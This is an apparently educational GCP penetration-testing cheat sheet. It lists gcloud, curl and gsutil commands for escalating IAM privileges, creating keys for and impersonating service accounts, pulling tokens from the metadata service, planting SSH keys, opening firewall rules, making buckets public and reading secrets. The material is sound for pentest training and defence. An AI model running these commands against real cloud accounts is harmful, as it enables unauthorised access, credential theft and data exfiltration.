Cloud
GCP Cheat Sheet

Commands

bash
# login
gcloud auth login
 
# list authenticated users
gcloud auth list 
 
# get the current authenticated user with its associated projects
gcloud config list 
 
# switch between accounts 
gcloud config set account other-account-user-name 
 
# List organizations you have access to
gcloud organizations list
 
# List project hirarchy
gcloud projects get-ancestors project-id
 
# List organization folders
gcloud resource-manager folders list --organization organization_id
 
# List projects
gcloud projects list
 
# List compute instances
gcloud compute instances list
 
# List all the commands
gcloud
 
# Authenticate with service account
gcloud auth activate-service-account --key-file svc-key-file.json
bash
=================
Service Accounts
=================
 
# List all service accounts
gcloud iam service-accounts list
 
 
================
IAM
================
 
# Get user permissions on any resource
gcloud organizations get-iam-policy organization_id
gcloud projects get-iam-policy project_id
 
 
================
General
================
 
# See the actual HTTP request sent in the back
gcloud projects list --log-http

Notes

Service Accounts

  • Types of service accounts:

    1. Default service accounts: are created automatically when the user create any computing workload.
      • App engine default service account.
      • Compute engine default service account.
    2. User-managed service accounts: created and managed by users.
    3. Google-managed service accounts: created and managed by google

  • Reasons why service accounts are targeted by the attackers:

    1. They are used without MFA
    2. They are integrated within the code/project so they can be found on github projects ... etc.
    3. They don't have expiration date by defualt.

  • Service account are identified by their unique email address.

  • Service accounts can have up to 10 keys.

IAM

  • AWS follows Identity-based-policy which means the policies are attached directly to the identity.
  • GCP and Azure follow Resource-based-policy which means the policy is attached on the resource not on the identity itself.

GCP Authentication

  • There are multiple ways of authentication in GCP
    • GCP Portal [GUI] : username & password
    • Gcloud CLI
      • username & password
      • service account with JSON key file
    • Google Cloud API
      • Access token can be validated via https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=AccessToken
    • External application

      • username & password

      • service account JSON key file

      • application default credentials

        • When your application runs in a GCP environment such as Compute Engine, Google Kubernetes Engine, or App Engine, ADC automatically detects the environment and determines the appropriate method for obtaining credentials.

        • ADC resolves credentials based on the environment. For example:

          • On Compute Engine and Google Kubernetes Engine, ADC can use the instance or pod's identity to obtain credentials from the metadata service.
          • On App Engine, ADC can use the built-in service account associated with the application.
          • In local development environments, ADC can use your user credentials if you're using the Google Cloud SDK.
  • GCP creds are stored on local system in 2 files called access_tokens.db and credentials.db
    • Windows c:\users\username\AppDate\Roaming\gcloud
    • Linux /home/username/.config/gcloud

Exploitation

IAM Exploitation

Exploit by Set IAM Policy Permission

bash
#Check iam policy on project level.
gcloud projects get-iam-policy [project-id] --flatten="bindings[].members" --filter="bindings.members=user:emp01@atomic-nuclear.site" --format="value(bindings.role)"
gcloud iam roles describe [rolename] --project alert-nimbus-335411
 
#Add a policy binding to the IAM policy of a project - User.
gcloud projects add-iam-policy-binding [project-id] --member='user:[user-email]' --role='roles/owner'
 
#Add a policy binding to the IAM policy of a project - Service Account.
gcloud projects add-iam-policy-binding [project-id] --member='serviceAccount:[sa-email]' --role='roles/editor'

Exploit by Custom Role Permission Update

bash
 
#Check iam policy on project level.
gcloud projects get-iam-policy [project-id] --flatten="bindings[].members" --filter="bindings.members=user:emp01@atomic-nuclear.site" --format="value(bindings.role)"
 
# List of all permission in custom role.
gcloud iam roles describe [rolename] --project alert-nimbus-335411
 
# Set iam policy on project level.
gcloud iam roles update [RoleName] --project=[my-project-id] --add-permissions=resourcemanager.projects.setIamPolicy

Service Account Exploitation

Service Account Key Admin

Description
  • Key Admin can create a new key of an service account.
  • A service account can have up to 10 keys.
Permission
  • Roles: roles/iam.serviceAccountAdmin , roles/iam.serviceAccountKeyAdmin
  • Permission: iam.serviceAccountkeys.create
bash
#Check iam policy on project level.
gcloud projects get-iam-policy [project-id] --flatten="bindings[].members" --filter="bindings.members=user:emp01@atomic-nuclear.site" --format="value(bindings.role)"
 
#List of service account in a gcp project.
gcloud iam service-accounts list
 
#List of service account in a gcp project.
gcloud iam service-accounts get-iam-policy [ServiceAccountID]
 
#List of keys associated with the specified service account.
gcloud iam service-accounts keys list --iam-account [ServiceAccountID]
 
#Create a new key for specified service account.
gcloud iam service-accounts keys create [FileName.json] --iam-account [ServiceAccountID]

Service account impersonation

If we have this role Roles: roles/iam.serviceAccountTokenCreator which have the following perissions :

  • iam.serviceAccounts.getAccessToken: lets you create OAuth 2.0 access tokens
  • iam.serviceAccounts.getOpenIdToken: lets you create OpenID Connect (OICD) ID tokens

we can create a short-life credentials for the service account, and we also can impersonate the service account by using --impersonate-service-account

bash
 
#Check iam policy on project level.
gcloud projects get-iam-policy [project-id] --flatten="bindings[].members" --filter="bindings.members=user:emp01@atomic-nuclear.site" --format="value(bindings.role)"
 
#List of service account in a gcp project.
gcloud iam service-accounts list
 
#List of service account in a gcp project.
gcloud iam service-accounts get-iam-policy [ServiceAccountID]
 
#Create short-lived credentials [access token] for service accounts by impersonation.
gcloud auth print-access-token --impersonate-service-account [ImpersonateServiceAccountEmail]
 
#Create short-lived credentials [identity token] for service accounts by impersonation.
gcloud auth print-identity-token --impersonate-service-account [ImpersonateServiceAccountEmail]
 
#Verify short-lived credentials [access token].
curl https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=[AccessToken]
 
#Verify short-lived credentials [identity token].
curl https://www.googleapis.com/oauth2/v1/tokeninfo?identity_token=[IdentityToken]

Service account user

Description

• Allows principals to indirectly access all the resources that the service account can access. • Principal can attach service account to any compute resource and access it’s permissions.

Permission
  • Roles: roles/iam.serviceAccountUser
  • Permissions : iam.serviceAccounts.actAs
Exploitaiton
bash
# Check iam policy on project level.
gcloud projects get-iam-policy [project-id] --flatten="bindings[].members" --filter="bindings.members=user:emp01@atomic-nuclear.site" --format="value(bindings.role)"
 
# List of service account in a gcp project.
gcloud iam service-accounts list
 
# Get IAM policy of a service account
gcloud iam service-accounts get-iam-policy [ServiceAccountID]
 
# Create cloud function with attached service account.
gcloud functions deploy [my-fun] --timeout 539 --trigger-http --source [function-source] --runtime python37 --entry-point hello_world --service-account [service-account-email]
 
# Invoke cloud function and retrieve temporary credential.
gcloud functions call function-name --data '{}'

Cloud Function

  • Cloud function is serverless event driven compute engine.
  • Cloud function can be triggered/ invokeed by multiple ways.
    • Gcloud CLI
    • Google Cloud Console
    • HTTP Request
    • Event Driven - Pub/Sub

Cloud function code update

Description
  • CloudFunctionsAdmin role allow threat actor to create a new function or modify the source code of any existing function. and invoke cloud function directly from gcloud cli
Permission

  • Roles : roles/cloudfunctions.admin

  • Permissions : cloudfunctions.functions.create, cloudfunctions.functions.update, cloudfunctions.functions.call

Exploitation
bash
# Check iam policy on project level.
gcloud projects get-iam-policy [project-id] --flatten="bindings[].members" --filter="bindings.members=user:emp01@atomic-nuclear.site" --format="value(bindings.role)"
 
# List of all cloud function in gcp project.
gcloud functions list
 
# Create / Update existing cloud function source code.
gcloud functions deploy [function-name] --timeout 539 --source [source-code-directory-path] --runtime python37
 
# Invoke cloud function using gcloud cli.
gcloud functions call myprivesc-fun --data '{}'

Compute Instance

  • Instance is a VM on GCP
  • These are the main components of compute instance
    • Instance Access
    • Default Service Account
    • Firewall Rules
Instance Access
Default Service Account
  • Compute Engine Default Service Account : projectnumber-compute@developer.gserviceaccount.com
  • Default Role: Editor [Project Level]
  • Oauth Scope :
    • Allow default access [Default] - Cloud Storage
    • Allow full access to all Cloud APIs
    • Set access for each API

Access / Identity token extraction

Description
  • Threat actor can execute command on compute instance and extract access token from metadata endpoint.
  • Command can be executed by
  • SSRF / RCE on VM
  • Directly vm access [SSH/ RDP]
  • Startup script execution on vm.
Permission
  • Roles : N/A
  • Permissions : N/A
Exploitation
bash
# GCP access token value extraction.
curl -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/[SVC_ACCT]/token"
 
# GCP access token scope extraction.
curl -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/[SVC_ACCT]/scope"
 
# Verify gcp access token.
curl https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=[AccessToken]
 
 
# GCP identity token extraction.
curl -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/[SVC_ACCT]/identity"
 
# Verify gcp identity token.
curl https://www.googleapis.com/oauth2/v1/tokeninfo?identity_token=[IdentityToken]

OAuth Scope manipulation

Description
  • Oauth Scope :
    • Allow default access [Default] - Cloud Storage
    • Allow full access to all Cloud APIs
    • Set access for each API
  • To change an instance's service account and access scopes, the instance must be temporarily stopped.
Permissions
  • Roles : roles/compute.admin, roles/compute.instanceAdmin, roles/compute.instanceAdmin.v1, Service Account User
  • Permissions : compute.instances.setServiceAccount
Exploitation
bash
# Check iam policy on project level.
gcloud projects get-iam-policy [project-id] --flatten="bindings[].members" --filter="bindings.members=user:emp01@atomic-nuclear.site" --format="value(bindings.role)"
 
# List of all compute instance in gcp project.
gcloud compute instances list
 
# Get the all information about an instance .
gcloud compute instances describe [instance-1]
 
# Stop a compute instance .
gcloud compute instances stop instance-1
 
# Change service account or oauth scope of a compute instance.
cloud compute instances set-service-account [instance-name] --service-account [service-account-name] --scopes [cloud-platform] --zone [Zone]
 
# Again, Restart a compute instance .
gcloud compute instances start instance-1

Lateral movement (SetMetaData)

  • Metadata contains a lot of information about project and instance, e.g project details, instance details, public ssh key etc.
  • Metadata can be set on project level as well as instance level.
  • We can add public ssh key for compute instance using metadata.
  • Instance level ssh key will be only applicable for that instance.
  • Project level ssh key will be applied on all the instance within that project.
MetaData on the project level
Description

• Setting SSH key as project metadata.

Permission
  • Roles : roles/compute.instanceAdmin.v1, roles/iam.serviceAccountUser
  • Permissions : compute.projects.setCommonInstanceMetadata, iam.serviceAccounts.actAs
Exploitation
bash
# Check iam policy on project level.
gcloud projects get-iam-policy [project-id] --flatten="bindings[].members" --filter="bindings.members=user:emp01@atomic-nuclear.site" --format="value(bindings.role)"
 
# Get the information about project metadata.
gcloud compute project-info describe
 
# Generate ssh key pair.
ssh-keygen
 
# Arrange ssh public key in this format in a file.
username:ssh-rsa [AAAAB3NzaC1yc2EAAAADAQABAAABAQ]
 
# Set ssh key value in the project metadata.
gcloud compute project-info add-metadata --metadata-from-file=ssh-keys=[KEY_FILE]
MetaData on the instance level
Description

• Setting SSH key as instance metadata.

Permission
  • Roles : roles/compute.instanceAdmin.v1, roles/iam.serviceAccountUser
  • Permissions : compute.instances.setMetadata, iam.serviceAccounts.actAs
Exploitation
bash
# Check iam policy on project level.
gcloud projects get-iam-policy [project-id] --flatten="bindings[].members" --filter="bindings.members=user:emp01@atomic-nuclear.site" --format="value(bindings.role)"
 
# Get the information about instance metadata.
gcloud compute instances describe
 
# Generate ssh key pair.
ssh-keygen
 
# Arrange ssh public key in this format in a file.
username:ssh-rsa [AAAAB3NzaC1yc2EAAAADAQABAAABAQ]
 
# Set ssh key value in the instance metadata.
gcloud compute instances add-metadata [VM_NAME] --metadata-from-file ssh-keys=[KEY_FILE]
Lateral Movement (OSLogin)
  • OS Login is used to manage SSH access to gcp instances using IAM without having to create and manage individual SSH keys.
  • Oslogin allow two type of ssh access privilege
    • Root user
    • Non root user
  • OS Login can be configured with 2-steps verification.
  • Enable OS Login by setting the following metadata on project / instance level. • enable-oslogin=TRUE
Description

• Access VM instance without ssh key.

Permission
  • Roles : roles/compute.osAdminLogin, roles/compute.osLogin
  • Permissions : compute.instances.osAdminLogin, compute.instances.osLogin
Exploitation
bash
# Check iam policy on project level.
gcloud projects get-iam-policy [project-id] --flatten="bindings[].members" --filter="bindings.members=user:emp01@atomic-nuclear.site" --format="value(bindings.role)"
 
# List of all compute instance in gcp project.
gcloud compute instances list
 
# Get the all information about an instance .
gcloud compute instances describe [instance-1]
 
# SSH to compute instance using oslogin.
gcloud compute ssh --zone=[ZONE] [VM_NAME]

VPC

  • Default VPC have total 36 default subnets [one subnet in each region]
  • Shared VPC allows to share same network with different projects

VPC Rules Manipulation

Description
  • In GCP firewall rules are managed by Firewall Rules Targets.
    • All instances in the networks
    • Specified target tags
    • Specified service account
  • Threat actor can manipulate firewall rules by -
    • Firewall Rules Targets.
    • Add / Remove entry in ingress / egress tables.
Permissions
  • Roles : roles/compute.admin, roles/compute.securityAdmin
  • Permissions : compute.firewalls.create, compute.firewalls.update, compute.networks.updatePolicy
Exploitation
bash
# Check iam policy on project level.
gcloud projects get-iam-policy [project-id] --flatten="bindings[].members" --filter="bindings.members=user:emp01@atomic-nuclear.site" --format="value(bindings.role)"
 
# List of all permission in custom role.
gcloud iam roles describe [rolename] --project alert-nimbus-335411
 
# List of all firewall rules in a gcp project.
gcloud compute firewall-rules list --format=json
 
# List of all compute instance in a gcp project.
gcloud compute instances list
 
# Get the all information about a vm.
gcloud compute instances describe [instance-1]
 
# Create firewall new rules with which is applicable for all instance within a vpc. Firewall Rules Targets - All Instance in the networks 
gcloud compute firewall-rules create threat-rule --allow=tcp:22 --source-ranges="0.0.0.0/0" --direction=INGRESS

Cloud Storage

  • There are two type of IAM policy in cloud storage.
    • Bucket Policy [uniform bucket-level access] - Applied on bucket level and all objects within the bucket.
    • ACL - Applied on individual object level.
  • Different type of principal [identity] in storage IAM:
    • allUsers - Unauthenticated users [anonymous access]
    • allAuthenticatedUsers - all authenticated user which have google account
    • IAM - Users/ groups / service accounts within the same organization/ project control by IAM

Data Exfiltration using changing bucket policy

Description

• Change the bucket policy and allow everyone to access data [objects] inside the gcp bucket.

Permissions
  • Roles : roles/storage.admin
  • Permissions : storage.buckets.setIamPolicy
Exploitation
bash
# Get the gcp bucket subdomain for an organization. [Anonymous - Enum Tool].
cloudenum.py -k cwl
 
# Get the information about objects in a bucket [Anonymous - Rest API].
curl https://storage.googleapis.com/[BUCKET NAME]
 
# Get the information about iam permission attached to the bucket . [Anonymous - Rest API].
https://www.googleapis.com/storage/v1/b/[BUCKET_NAME]/iam/testPermissions?permissions=[storage.buckets.dele te&permissions=storage.buckets.get&permissions=storage.buckets.getIamPolicy&permissions=storage.buckets.setIamPo licy&permissions=storage.buckets.update&permissions=storage.objects.create&permissions=storage.objects.delete&per missions=storage.objects.get&permissions=storage.objects.list&permissions=storage.objects.update]
 
# list all roles attached to this bucket. [Anonymous - Rest API].
gsutil iam get gs://[BUCKET NAME]
 
# Add an admin role for allUsers. [Anonymous - Rest API].
gsutil iam ch allUsers:admin gs://[BUCKET NAME]

Secret Manager

Clear Text Credentials Access

Description

• As a threat actor final goal is to get clear text value of a secret.

Permissions
  • Roles : roles/owner, roles/secretmanager.admin, roles/secretmanager.secretAccessor
  • Permissions : secretmanager.versions.access
Exploitation
bash
# Check iam policy on project level.
gcloud projects get-iam-policy [project-id] --flatten="bindings[].members" --filter="bindings.members=user:emp01@atomic-nuclear.site" --format="value(bindings.role)"
 
# List all the secrets in a project.
gcloud secrets list
 
# Get Iam policy on individual secret level.
gcloud secrets get-iam-policy [my-secret]
 
# List of all version for a secret.
gcloud secrets versions list [SecretName]
 
# Get the cleartext value of a secret.
gcloud secrets versions access --secret cpsa-key-json [1]

GCP Pentest checklist

https://github.com/CyberSecurityUP/GCP-Pentest-Checklist (opens in a new tab)

Cloud Storage bucket permissions

AWS Cheat SheetOSI Layers Attacks